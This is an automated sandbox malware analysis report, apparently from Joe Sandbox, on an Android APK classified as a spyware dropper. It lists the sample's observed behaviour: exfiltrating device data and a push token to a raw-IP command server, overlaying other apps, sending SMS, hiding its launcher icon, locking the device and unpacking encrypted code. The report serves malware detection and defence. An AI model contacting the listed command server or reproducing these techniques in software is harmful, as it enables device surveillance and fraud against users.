Analysis Report com.antonsilin.android.apps-v3.0.0.apk

Overview

General Information

Joe Sandbox Version: 24.0.0 Fire Opal
Analysis ID: 705305
Start date: 07.11.2018
Start time: 15:19:30
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 5m 48s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: com.antonsilin.android.apps-v3.0.0.apk
Cookbook file name: defaultandroidfilecookbook.jbs
Analysis system description: Android x86 6.0 EEE PC
Detection: MAL
Classification: mal68.troj.spyw.expl.andAPK@0/253@47/0
Warnings:
  • No interacted views
  • Not all executed log events are in report (maximum 10 identical API calls)
  • Not all resource files were parsed
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size exceeded maximum capacity and may have missing dynamic data code.
  • Report size exceeded maximum capacity and may have missing network information.

Detection

Strategy    Score   Range     Reporting        Detection
Threshold   68      0 - 100   Report FP / FN   malicious

Classification

Mitre Att&ck Matrix

Signature Overview


AV Detection:

Antivirus detection for submitted file
Source: com.antonsilin.android.apps-v3.0.0.apk | Avira: Label: ANDROID/Dropper.FNDZ.Gen

Networking:

Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.1.34:45149 -> 178.132.78.51:84
May check the online IP address of the machine
Source: unknown | DNS query: name: ip-api.com
Uses known network protocols on non-standard ports
Source: unknown | Network traffic detected: HTTP traffic on port 45149 -> 84
Source: unknown | Network traffic detected: HTTP traffic on port 84 -> 45149
Checks an internet connection is available
Source: com.google.firebase.iid.zzac;->run:91 | API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.firebase.iid.zzac;->run:91 | API Call: android.net.NetworkInfo.isConnected
Source: com.appsflyer.AppsFlyerLib;->getNetwork:546 | API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.internal.zzckj;->zzbca:492 | API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.internal.zzckj;->zzbca:492 | API Call: android.net.NetworkInfo.isConnected
Source: com.google.android.gms.internal.zzckj;->zzbby:2641 | API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.internal.zzckj;->zzbby:2641 | API Call: android.net.NetworkInfo.isConnected
Source: com.google.android.gms.internal.zzckj;->zzb:2558 | API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.internal.zzckj;->zzb:2558 | API Call: android.net.NetworkInfo.isConnected
Source: com.google.android.gms.internal.zzckj;->zza:1759 | API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.internal.zzckj;->zza:1759 | API Call: android.net.NetworkInfo.isConnected
Source: com.google.firebase.iid.zzac;->zzclv:104 | API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.firebase.iid.zzac;->zzclv:105 | API Call: android.net.NetworkInfo.isConnected
Source: com.google.android.gms.internal.zzcjn;->zzaax:16 | API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.internal.zzcjn;->zzaax:17 | API Call: android.net.NetworkInfo.isConnected
Source: utils.packed.com.scheduler.SmartScheduler;->isConnected:151 | API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: utils.packed.com.scheduler.SmartScheduler;->isConnected:152 | API Call: android.net.NetworkInfo.isConnectedOrConnecting
Source: utils.packed.com.scheduler.SmartScheduler;->isConnectionUnMetered:157 | API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 172.217.17.227
Source: unknown | TCP traffic detected without corresponding DNS query: 216.58.207.138
Source: unknown | TCP traffic detected without corresponding DNS query: 216.58.207.174
Source: unknown | TCP traffic detected without corresponding DNS query: 178.132.78.51
Connects to many different domains
Source: unknown | Network traffic detected: DNS query count 47
Loads a webpage with cache disabled
Source: webteam.displ.com.WvWrapper;->init:18 | API Call: android.webkit.WebSettings.setCacheMode
Opens an internet connection
Source: utils.packed.com.rest.RestClient;->createConnection:9 | API Call: java.net.URL.openConnection("http://ip-api.com/json")
Source: utils.packed.com.rest.RestClient;->createConnection:9 | API Call: java.net.URL.openConnection("http://178.132.78.51:84/api/v2/device")
Source: com.appsflyer.AppsFlyerLib;->callServer:147 | API Call: java.net.URL.openConnection("https://t.appsflyer.com/api/v4/androidevent?buildnumber=4.7.4&app_id=com.antonsilin.android.apps")
Source: com.google.android.gms.internal.zzcjn;->zzb:37 | API Call: java.net.URL.openConnection("https://app-measurement.com/config/app/1%3A673516030624%3Aandroid%3A82c49bcc28702d1a?app_instance_id=d2192fa0671390bc68384e12103f1d5d&platform=android&gmp_version=12211")
Source: com.google.android.gms.internal.zzcjn;->zzb:37 | API Call: java.net.URL.openConnection("https://app-measurement.com/a")
Source: com.appsflyer.AppsFlyerLib$a;->run:53 | API Call: java.net.URL.openConnection (not executed)
Source: com.appsflyer.h;->doInBackground:32 | API Call: java.net.URL.openConnection (not executed)
Source: downloadmanager.DownloadDispatcher;->executeDownload:27 | API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.ads.identifier.zza;->run:16 | API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.internal.zzas;->zza:49 | API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.internal.zzcnq;->connect:9 | API Call: javax.net.ssl.SSLSocket.connect (not executed)
Source: com.google.android.gms.internal.zzcnq;->connect:11 | API Call: javax.net.ssl.SSLSocket.connect (not executed)
Source: utils.packed.com.utils.CommonUtils$1;->run:4 | API Call: java.net.URL.openConnection (not executed)
Performs DNS lookups (Java API)
Source: com.google.gson.internal.bind.TypeAdapters$23;->read:7 | API Call: java.net.InetAddress.getByName (not executed)
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected:
  GET /json HTTP/1.1
  Authorization: dee2cdd8a7942efa
  Content-Type: application/json
  User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0.1; VirtualBox Build/MOB31E)
  Host: ip-api.com
  Connection: Keep-Alive
  Accept-Encoding: gzip
Found strings which match to known social media urls
Source: loader-packed(4-2-1).encrypted.dr | String found in binary or memory: (.*youtube.*) equals www.youtube.com (Youtube)
Source: android | String found in binary or memory: com.facebook.katana equals www.facebook.com (Facebook)
Source: android | String found in binary or memory: content://com.facebook.katana.provider.AttributionIdProvider equals www.facebook.com (Facebook)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: ip-api.com
Posts data to webserver
Source: unknown | HTTP traffic detected:
  POST /api/v2/device HTTP/1.1
  Authorization: dee2cdd8a7942efa
  Content-Type: application/json
  charset: utf-8
  Content-Length: 278
  User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0.1; VirtualBox Build/MOB31E)
  Host: 178.132.78.51:84
  Connection: Keep-Alive
  Accept-Encoding: gzip
  Data Raw: 7b 22 70 75 73 68 5f 74 6f 6b 65 6e 22 3a 22 65 7a 55 6c 38 57 4e 30 51 34 6b 3a 41 50 41 39 31 62 45 6d 33 4f 4c 74 70 47 55 7a 62 6b 69 74 41 77 44 48 48 77 61 49 51 59 62 38 33 41 42 63 6f 30 41 7a 4d 59 37 34 36 59 39 61 58 4e 63 67 63 39 6e 53 43 6e 36 35 58 43 73 6b 42 74 65 38 4b 37 41 4a 51 39 35 62 49 57 34 72 6f 67 66 47 56 44 67 5f 7a 5f 42 76 4f 4e 6b 64 54 51 39 43 38 68 44 49 72 79 61 56 43 38 6c 4f 6a 69 47 34 70 64 48 4b 4a 56 74 51 6e 66 79 47 63 5a 67 61 4b 64 68 52 61 53 69 75 22 2c 22 6f 73 5f 76 65 72 73 69 6f 6e 22 3a 22 73 61 6d 73 75 6e 67 20 47 61 6c 61 78 79 20 4e 65 78 75 73 20 2d 20 41 6e 64 72 6f 69 64 3a 20 32 33 20 28 34 2e 32 2e 31 29 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 53 22 2c 22 74 61
  (the raw bytes above, truncated by the report, decode to the start of a JSON body: {"push_token":"ezUl8WN0Q4k:APA91bEm3OLtpGUzbkitAwDHHwaIQYb83ABco0AzMY746Y9aXNcgc9nSCn65XCskBte8K7AJQ95bIW4rogfGVDg_z_BvONkdTQ9C8hDIryaVC8lOjiG4pdHKJVtQnfyGcZgaKdhRaSiu","os_version":"samsung Galaxy Nexus - Android: 23 (4.2.1)","country":"US","ta ; the push_token value is the FCM token read from shared preferences in the System Summary section)
Urls found in memory or binary data
Source: resources.arsc | String found in binary or memory: http://178.132.78.51:84/api/v2/
Source: resources.arsc | String found in binary or memory: http://178.132.78.51:84/api/v2/$$https://my-apps-b19a2.firebaseio.com44https://www.finanzen100.de/de
Source: android | String found in binary or memory: http://178.132.78.51:84/api/v2/device
Source: android | String found in binary or memory: http://ip-api.com/json
Source: abc_tint_btn_checkable.xml, abc_select_dialog_material.xml | String found in binary or memory: http://schemas.android.com/apk/res-auto
Source: common_google_signin_btn_icon_light_focused.xml, abc_tint_btn_checkable.xml, notification_action_background.xml, abc_screen_simple.xml, abc_search_view.xml, abc_ratingbar_small_material.xml, abc_select_dialog_material.xml, abc_action_menu_item_layout.xml, abc_alert_dialog_title_material.xml, abc_alert_dialog_button_bar_material.xml, abc_screen_simple_overlay_action_mode.xml, abc_slide_out_bottom.xml, abc_popup_menu_item_layout.xml, abc_expanded_menu_layout.xml, abc_ic_arrow_drop_right_black_24dp.xml | String found in binary or memory: http://schemas.android.com/apk/res/android
Source: android | String found in binary or memory: https://api.appsflyer.com/install_data/v3/
Source: android | String found in binary or memory: https://app-measurement.com/a
Source: android | String found in binary or memory: https://app-measurement.com/config/app/1%3A673516030624%3Aandroid%3A82c49bcc28702d1a?app_instance_id
Source: android | String found in binary or memory: https://events.appsflyer.com/api/v
Source: android | String found in binary or memory: https://goo.gl/NAOOOI
Source: android | String found in binary or memory: https://goo.gl/NAOOOI.
Source: android | String found in binary or memory: https://monitorsdk.appsflyer.com/remote-debug?app_id=
Source: android | String found in binary or memory: https://my-apps-b19a2.firebaseio.com
Source: android | String found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=gmob-apps
Source: android | String found in binary or memory: https://plus.google.com/
Source: android | String found in binary or memory: https://register.appsflyer.com/api/v
Source: android | String found in binary or memory: https://sdk-services.appsflyer.com/validate-android-signature
Source: android | String found in binary or memory: https://stats.appsflyer.com/stats
Source: android | String found in binary or memory: https://t.appsflyer.com/api/v
Source: android | String found in binary or memory: https://t.appsflyer.com/api/v4/androidevent?buildnumber=4.7.4&app_id=com.antonsilin.android.apps
Source: android | String found in binary or memory: https://validate.appsflyer.com/api/v
Source: resources.arsc, android | String found in binary or memory: https://www.finanzen100.de/devisen/waehrungsrechner/
Source: android | String found in binary or memory: https://www.google.com
Source: android | String found in binary or memory: https://www.googleapis.com/auth/games
Source: android | String found in binary or memory: https://www.googleapis.com/auth/games_lite
Uses HTTP for connecting to the internet
Source: utils.packed.com.rest.RestClient;->makePostInner:50 | API Call: com.android.okhttp.internal.huc.HttpURLConnectionImpl.connect
Source: com.google.android.gms.internal.zzcjr;->run:35 | API Call: com.android.okhttp.internal.huc.HttpsURLConnectionImpl.connect
Source: com.appsflyer.AppsFlyerLib$a;->run:60 | API Call: java.net.HttpURLConnection.connect
Source: com.appsflyer.h;->doInBackground:59 | API Call: java.net.HttpURLConnection.connect
Uses HTTPS

E-Banking Fraud:

Has functionality to add an overlay to other apps
Source: utils.packed.com.components.locker.LockerComponent$CheckService;->showOverlay:91 | API Call: WindowManager.addView
Loads a webpage with cache disabled
Source: webteam.displ.com.WvWrapper;->init:18 | API Call: android.webkit.WebSettings.setCacheMode

Spam, unwanted Advertisements and Ransom Demands:

May use Google Cloud Messaging (GCM) or Google's Cloud to Device Messaging (C2DM) services
Source: submitted apk | Request permission: com.antonsilin.android.apps.permission.C2D_MESSAGE
Sends SMS using SmsManager
Source: utils.packed.com.components.TextComponent;->onSmsComeToSend:6 | API Call: android.telephony.SmsManager.sendTextMessage

Operating System Destruction:

Lists and deletes files in the same context
Source: com.google.android.gms.internal.zzam;->initialize:108 | API Calls in same method context: File.listFiles, File.delete

Change of System Appearance:

May access the Android keyguard (lock screen)
Source: android | String found in binary or memory: keyguard
Acquires a wake lock
Source: com.google.firebase.iid.zzac;->run:82 | API Call: android.os.PowerManager$WakeLock.acquire
Source: com.google.android.gms.internal.zzcyz;->acquire:84 | API Call: android.os.PowerManager$WakeLock.acquire
Source: utils.packed.com.components.locker.LockerComponent$CheckService;->init:76 | API Call: android.os.PowerManager$WakeLock.acquire
Mutes ringtone sound
Source: utils.packed.com.components.locker.LockerComponent;->lockDevice:16 | API Call: android.media.AudioManager.setRingerMode("0")
Sets a repeating alarm
Source: utils.packed.com.scheduler.SmartScheduler;->addAlarmJob:27 | API Call: android.app.AlarmManager.setRepeating

System Summary:

Requests permissions only permitted to signed APKs or APKs which are within the system image
Source: submitted apk | Request permission: android.permission.INSTALL_PACKAGES
Requests potentially dangerous permissions
Source: submitted apk | Request permission: android.permission.INTERNET
Source: submitted apk | Request permission: android.permission.WAKE_LOCK
Classification label
Source: classification engine | Classification label: mal68.troj.spyw.expl.andAPK@0/253@47/0
Reads shared settings
Source: com.google.firebase.iid.zzaa;->zzq:85 | API Call: "|T|673516030624|*": null
Source: com.google.firebase.iid.zzaa;->zzrs:173 | API Call: "|S||P|": null
Source: com.google.firebase.iid.zzaa;->zzrs:177 | API Call: "|S||K|": null
Source: com.appsflyer.AppsFlyerProperties;->loadProperties:40 | API Call: "savedProperties": null
Source: com.google.android.gms.internal.zzcju;->zzbbe:65 | API Call: "gmp_app_id": null
Source: com.google.android.gms.internal.zzcjz;->zzbbj:6 | API Call: "app_instance_id": null
Source: com.google.android.gms.internal.zzcju;->zzbbi:96 | API Call: "previous_os_version": null
Source: com.appsflyer.AppsFlyerProperties;->getReferrer:27 | API Call: "referrer": null
Source: com.google.android.gms.ads.identifier.zzb;->getString:22 | API Call: "gads:ad_id_use_shared_preference:experiment_id":
Source: com.google.firebase.iid.zzaa;->zzcls:74 | API Call: "topic_operaion_queue": null
Source: com.appsflyer.k;->readInstallationSP:61 | API Call: "AF_INSTALLATION": null
Source: com.appsflyer.AppsFlyerLib;->addDeviceTracking:72 | API Call: "imeiCached": null
Source: com.google.firebase.iid.zzaa;->zzq:85 | API Call: "|T|673516030624|*": {"token":"ezUl8WN0Q4k:APA91bEm3OLtpGUzbkitAwDHHwaIQYb83ABco0AzMY746Y9aXNcgc9nSCn65XCskBte8K7AJQ95bIW4rogfGVDg_z_BvONkdTQ9C8hDIryaVC8lOjiG4pdHKJVtQnfyGcZgaKdhRaSiu","appVersion":"3","timestamp":1541640054690}
Source: com.appsflyer.AppsFlyerLib;->addDeviceTracking:100 | API Call: "androidIdCached": null
Source: com.appsflyer.AppsFlyerLib;->getFirstInstallDate:512 | API Call: "appsFlyerFirstInstall": null
Source: com.appsflyer.AppsFlyerLib;->getEventParameters:1405 | API Call: "attributionId": null
Source: com.appsflyer.AppsFlyerLib;->getEventParameters:1410 | API Call: "extraReferrers": null
Source: com.appsflyer.AppsFlyerLib;->getEventParameters:1490 | API Call: "sentSuccessfully":
Source: com.appsflyer.AppsFlyerLib;->callServer:246 | API Call: "attributionId": null
Source: com.appsflyer.AppsFlyerLib;->callServer:195 | API Call: android.content.SharedPreferences.getBoolean
Source: com.appsflyer.AppsFlyerLib;->callServer:258 | API Call: android.content.SharedPreferences.getString
Source: com.appsflyer.AppsFlyerLib;->getCachedChannel:458 | API Call: android.content.SharedPreferences.getString
Source: com.appsflyer.AppsFlyerLib;->getCachedStore:466 | API Call: android.content.SharedPreferences.getString
Source: com.appsflyer.AppsFlyerLib;->getConversionData:485 | API Call: android.content.SharedPreferences.getString
Source: com.appsflyer.AppsFlyerLib;->getPreInstallName:559 | API Call: android.content.SharedPreferences.getString
Source: com.appsflyer.AppsFlyerLib;->lastEventsProcessing:710 | API Call: android.content.SharedPreferences.getString
Source: com.appsflyer.AppsFlyerLib;->lastEventsProcessing:721 | API Call: android.content.SharedPreferences.getString
Source: com.appsflyer.AppsFlyerLib;->addReferrer:972 | API Call: android.content.SharedPreferences.getString
Source: com.appsflyer.AppsFlyerLib;->getEventParameters:1493 | API Call: android.content.SharedPreferences.getBoolean
Source: com.appsflyer.MultipleInstallBroadcastReceiver;->onReceive:13 | API Call: android.content.SharedPreferences.getString
Source: com.appsflyer.SingleInstallBroadcastReceiver;->onReceive:13 | API Call: android.content.SharedPreferences.getString
Source: com.appsflyer.c;->getReferrer:13 | API Call: android.content.SharedPreferences.getString
Source: utils.packed.com.SdkManagerImpl;->getBaseApiUrl:52 | API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.ads.identifier.zzb;->getBoolean:10 | API Call: android.content.SharedPreferences.getBoolean
Source: com.google.firebase.iid.FirebaseInstanceId;->zzcli:125 | API Call: android.content.SharedPreferences.getBoolean
Source: com.google.firebase.iid.zzaa;->zzrl:90 | API Call: android.content.SharedPreferences.getString
Source: com.google.firebase.iid.zzaa;->zzro:109 | API Call: android.content.SharedPreferences.getString
Source: com.google.firebase.iid.zzaa;->zzrp:133 | API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.iid.zzaf;->get:59 | API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.iid.zzaf;->get:71 | API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.iid.zzaf;->zzf:109 | API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.flags.impl.zzc;->call:6 | API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.flags.impl.zzi;->call:5 | API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.internal.zzcju;->zzbap:50 | API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.internal.zzcju;->zzbbg:77 | API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.internal.zzcju;->zzbs:121 | API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.internal.zzcjw;->get:6 | API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.internal.zzcjy;->zzabh:47 | API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.auth.api.signin.internal.zzaa;->zzfg:88 | API Call: android.content.SharedPreferences.getString
Source: utils.packed.com.components.injects.mock.InjectHandler;->isInjectWasShowed:92 | API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.phenotype.zzs;->zzc:3 | API Call: android.content.SharedPreferences.getString

Data Obfuscation:

Unpacking routine for DEX file found
Source: Lwebteam/displ/com/MyApp$Helper;-><init>(Lwebteam/displ/com/MyApp;Landroid/app/Application;)V | Instruction: DexClassLoader and decryption
Found very long method strings
Source: Lcom/google/android/gms/common/zzm;->zzahi()[B | Method string: 0\u0082\u0004\u00a80\u0082\u0003\u0090\u00a0\u0003\u0002\u0001\u0002\u0002\t\u0000\u00d5\u0085\u00b8l}\u00d3N\u00f50\r\u0006\t*\u0086H\u0086\u00f7\r\u0001\u0001\u0004\u0005\u00000\u0081\u00941\u000b0\t\u0006\u0003U\u0004\u0006\u0013\u0002US1\u00130\u0011\ | Length: 4395
(the bytes begin with a DER SEQUENCE header followed by an X.509 TBSCertificate, i.e. a certificate embedded in the Google Play services library, not in the sample's own code)
Obfuscates method names
Source: com.antonsilin.android.apps-v3.0.0.apk | Total valid method names: 41%
Uses reflection
Source: com.google.firebase.FirebaseApp;->zza:132 | API Call: Real call: null
Source: com.google.firebase.FirebaseApp;->zza:132 | API Call: Real call: public static synchronized com.google.firebase.iid.FirebaseInstanceId com.google.firebase.iid.FirebaseInstanceId.getInstance(com.google.firebase.FirebaseApp)
Source: com.google.firebase.FirebaseApp;->zza:132 | API Call: Real call: null
Source: com.google.firebase.FirebaseApp;->zza:132 | API Call: Real call: public static com.google.android.gms.measurement.AppMeasurement com.google.android.gms.measurement.AppMeasurement.getInstance(android.content.Context)
Source: com.google.android.gms.internal.zzcno;->zzkq:508 | API Call: Real call: public static java.lang.String android.os.SystemProperties.get(java.lang.String,java.lang.String)
Source: unknown | API Call: Real call: public void android.view.ViewGroup.makeOptionalFitsSystemWindows()
Source: com.appsflyer.AppsFlyerLib;->getSystemProperty:1537 | API Call: Real call: null
Source: com.appsflyer.AppsFlyerLib;->getSystemProperty:1537 | API Call: Real call: public static java.lang.String android.os.SystemProperties.get(java.lang.String)
Source: com.appsflyer.AppsFlyerLib;->getSystemProperty:1537 | API Call: Real call: null
Source: com.appsflyer.AppsFlyerLib;->getSystemProperty:1537 | API Call: Real call: public static java.lang.String android.os.SystemProperties.get(java.lang.String)
Source: com.appsflyer.AppsFlyerLib;->getSystemProperty:1537 | API Call: Real call: null
Source: com.appsflyer.AppsFlyerLib;->getSystemProperty:1537 | API Call: Real call: null
Source: com.appsflyer.AppsFlyerLib;->getSystemProperty:1537 | API Call: Real call: null
Source: com.appsflyer.AppsFlyerLib;->getSystemProperty:1537 | API Call: Real call: public static java.lang.String android.os.SystemProperties.get(java.lang.String)
Source: com.google.android.gms.internal.zzckj;->zzbca:446 | API Call: Real call: public static java.lang.String android.os.SystemProperties.get(java.lang.String,java.lang.String)
Source: com.appsflyer.AppsFlyerLib;->addDeviceTracking:79 | API Call: java.lang.reflect.Method.invoke
Source: com.appsflyer.AppsFlyerLib;->getUniquePsuedoID:1566 | API Call: java.lang.reflect.Field.get
Source: com.appsflyer.a;->getGCMToken:209 | API Call: java.lang.reflect.Method.invoke
Source: com.appsflyer.a;->getGCMToken:213 | API Call: java.lang.reflect.Method.invoke
Source: com.google.gson.internal.bind.ReflectiveTypeAdapterFactory$1;->write:7 | API Call: java.lang.reflect.Field.get
Source: com.google.gson.internal.bind.ReflectiveTypeAdapterFactory$1;->writeField:16 | API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.dynamic.zzn;->zzy:9 | API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.dynamite.DynamiteModule;->zzc:144 | API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.dynamite.DynamiteModule;->zzx:295 | API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.dynamite.DynamiteModule;->zzx:298 | API Call: java.lang.reflect.Field.get
Source: com.google.gson.FieldAttributes;->get:4 | API Call: java.lang.reflect.Field.get
Source: com.google.gson.internal.UnsafeAllocator$1;->newInstance:5 | API Call: java.lang.reflect.Method.invoke
Source: com.google.gson.internal.UnsafeAllocator$2;->newInstance:5 | API Call: java.lang.reflect.Method.invoke
Source: com.google.gson.internal.UnsafeAllocator$3;->newInstance:4 | API Call: java.lang.reflect.Method.invoke
Source: com.google.gson.internal.UnsafeAllocator;->create:24 | API Call: java.lang.reflect.Field.get
Source: com.google.gson.internal.UnsafeAllocator;->create:31 | API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzbhp;->zzb:88API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzcik;->zzazu:51API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzclk;->zzb:204API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzdyq;->zzbss:32API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.internal.zzfhl;->zzty:10API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzfht;->zzj:21API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzfhu;->zza:53API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzfiq;->zzdas:14API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzfkr;->run:4API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.internal.zzflt;->zza:20API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.internal.zzflt;->zza:39API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzflt;->zza:47API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zza;->zza:32API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zza;->zzrz:219API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zza;->zzrz:236API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zza;->zzrz:244API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zza;->zzrz:257API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zzc;->zza:79API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zzc;->zza:131API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zzc;->zza:164API Call: java.lang.reflect.Field.get
Source: com.google.firebase.messaging.zzc;->zza:388API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zzc;->zzb:401API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zzc;->zzbe:410API Call: java.lang.reflect.Field.get
Source: com.google.firebase.messaging.zzc;->zzbf:415API Call: java.lang.reflect.Field.get
Source: com.google.gson.internal.reflect.UnsafeReflectionAccessor;->getUnsafeInstance:12API Call: java.lang.reflect.Field.get
Source: com.google.gson.internal.reflect.UnsafeReflectionAccessor;->makeAccessibleWithUnsafe:30API Call: java.lang.reflect.Method.invoke
Source: com.google.gson.internal.reflect.UnsafeReflectionAccessor;->makeAccessibleWithUnsafe:40API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.security.ProviderInstaller;->installIfNeeded:20API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.zzaa;->zza:8API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.zzaa;->zza:16API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.zzaa;->zze:52API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.zzaa;->zze:59API Call: java.lang.reflect.Method.invoke

Persistence and Installation Behavior:

Has permission to install other packages
Source: submitted apkRequest permission: android.permission.INSTALL_PACKAGES

Boot Survival:

Has permission to execute code after phone reboot
Source: submitted apkRequest permission: android.permission.RECEIVE_BOOT_COMPLETED
Installs a new wake lock (to keep the device awake or the screen on)
Source: com.google.firebase.iid.zzac;-><init>:6API Call: android.os.PowerManager.newWakeLock
Source: com.google.android.gms.internal.zzcyz;-><init>:21API Call: android.os.PowerManager.newWakeLock
Source: utils.packed.com.components.locker.LockerComponent$CheckService;->init:74API Call: android.os.PowerManager.newWakeLock

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 45149 -> 84
Source: unknownNetwork traffic detected: HTTP traffic on port 84 -> 45149
Queries list of running processes/tasks
Source: com.google.android.gms.gcm.zza;->zzdm:27API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.google.firebase.messaging.zza;->zzt:316API Call: android.app.ActivityManager.getRunningAppProcesses
Source: utils.packed.com.components.injects.processes_lib.AndroidProcesses;->getRunningAppProcessInfo:14API Call: android.app.ActivityManager.getRunningAppProcesses
Source: utils.packed.com.components.injects.stats_providers.ActivityManagerAppCheckerImpl;->getTopApplication:9API Call: android.app.ActivityManager.getRunningTasks
Removes its application launcher (likely to stay hidden)
Source: utils.packed.com.utils.CommonUtils;->hideApp:24API Call: android.content.pm.PackageManager.setComponentEnabledSetting
Uses Crypto APIs
Source: core.com.packed.CryptoUtils;->doCrypto:24API Call: javax.crypto.Cipher.getInstance
Source: com.google.firebase.iid.zzw;->zzb:5API Call: java.security.MessageDigest.getInstance
Source: com.google.firebase.iid.FirebaseInstanceId;->getId:181API Call: java.security.MessageDigest.digest
Source: core.com.packed.CryptoUtils;->doCrypto:26API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzcno;->zzeq:156API Call: java.security.MessageDigest.getInstance
Source: com.google.android.gms.internal.zzcno;->zzab:334API Call: java.security.MessageDigest.digest
Source: com.google.firebase.iid.FirebaseInstanceId;->getId:181API Call: java.security.MessageDigest.digest
Source: com.google.firebase.iid.FirebaseInstanceId;->getId:181API Call: java.security.MessageDigest.digest
Source: com.appsflyer.j;->toSHA1:30API Call: java.security.MessageDigest.getInstance
Source: com.appsflyer.j;->toSHA1:34API Call: java.security.MessageDigest.update
Source: com.appsflyer.j;->getHashCode:74API Call: java.security.MessageDigest.digest
Source: com.appsflyer.j;->toMD5:14API Call: java.security.MessageDigest.getInstance
Source: com.appsflyer.j;->toMD5:18API Call: java.security.MessageDigest.update
Source: com.appsflyer.j;->getHashCodeV2:107API Call: java.security.MessageDigest.digest
Source: com.appsflyer.j;->toSHA1:34API Call: java.security.MessageDigest.update
Source: com.appsflyer.j;->getHashCodeV2:108API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzcju;->zzjv:156API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzcju;->zzjv:156API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzcju;->zzjv:156API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzcju;->zzjv:156API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzcil;->zza:385API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzcju;->zzjv:156API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzcil;->zza:385API Call: java.security.MessageDigest.digest
Source: com.google.firebase.iid.FirebaseInstanceId;->getId:181API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzcju;->zzjv:156API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzcil;->zza:385API Call: java.security.MessageDigest.digest
Source: com.google.firebase.iid.FirebaseInstanceId;->getId:181API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzcju;->zzjv:156API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzcil;->zza:385API Call: java.security.MessageDigest.digest
